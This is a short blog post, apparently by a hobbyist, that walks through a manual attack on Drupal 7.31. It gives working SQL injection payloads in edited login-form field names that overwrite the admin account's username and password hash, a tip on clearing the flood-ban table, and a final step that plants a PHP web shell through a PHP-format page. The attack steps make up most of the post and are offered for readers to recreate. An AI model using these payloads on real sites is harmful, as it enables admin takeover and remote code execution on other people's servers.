Drupal to Low Priv Shell

by Vince
in Blog
Hits: 1847

There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

I can’t do a step by step walkthrough on this one but I can give you enough to where you should be able to recreate what I’ve done.  I found some scripts that injected users but it seemed easier just to take over the admin account.  Of course, this assumes the admin account is sitting at uid 1 but it was in this case.

This version of Drupal is vulnerable at the login.  We’re going to inject and update on the users table for both the name value and the pass value.  I also cleared the flood table because I might’ve tried to brute force the login prior and I may need to clear the ban on my IP.  :)

In advance of our injection, we’ll need a hash to overwrite the existing hash in the database.  You’ll need to generate the hash.  You can download an install from the Drupal website, install and once installed, you can find the script to generate the hash in the Drupal directory.  Syntax is as follows:

/var/www/drupal/scripts$ php password-hash.sh hacker

password: hacker                hash: $S$DLFvugcrYT.UNEjCyx1b7qfGB5cI36rcEjLcAxqmtTVKi9Ehw/PO

Now that we have our hash --

When you’re at the login page, inspect the username field element, edit as HTML and you should see the following:

<input type="text" id="edit-name" name="name" value="" size="15" maxlength="60" class="form-text required">

Replace with:

<input type="text" id="edit-name" name="name[0; UPDATE users SET name =’hacker’ WHERE uid=1;;#  ]" value="" size="15" maxlength="60" class="form-text required">
<input type="text" id="edit-name" name="name[0]" value="" size="15" maxlength="60" class="form-text required">

Populate the two username and password fields, hit “Log in”, and you should get an error but the data has been written.  Repeat the task but this time, we’re updating the password field.

<input type="text" id="edit-name" name="name[0; UPDATE users SET pass ='$S$DZcyWTmY48CLP7TFkavtDlVUEeiPayVjdzzgS/CJJqo1Io1ad0Ii' WHERE uid=1;;#  ]" value="" size="15" maxlength="60" class="form-text required">
<input type="text" id="edit-name" name="name[0]" value="" size="15" maxlength="60" class="form-text required">

Now you should be able to login to Drupal as the admin with the username and password both set to:  hacker

From here, you can move to a low privilege shell by creating a Basic Page with the Text format set to PHP code, insert your favorite PHP shell and you’re on the box.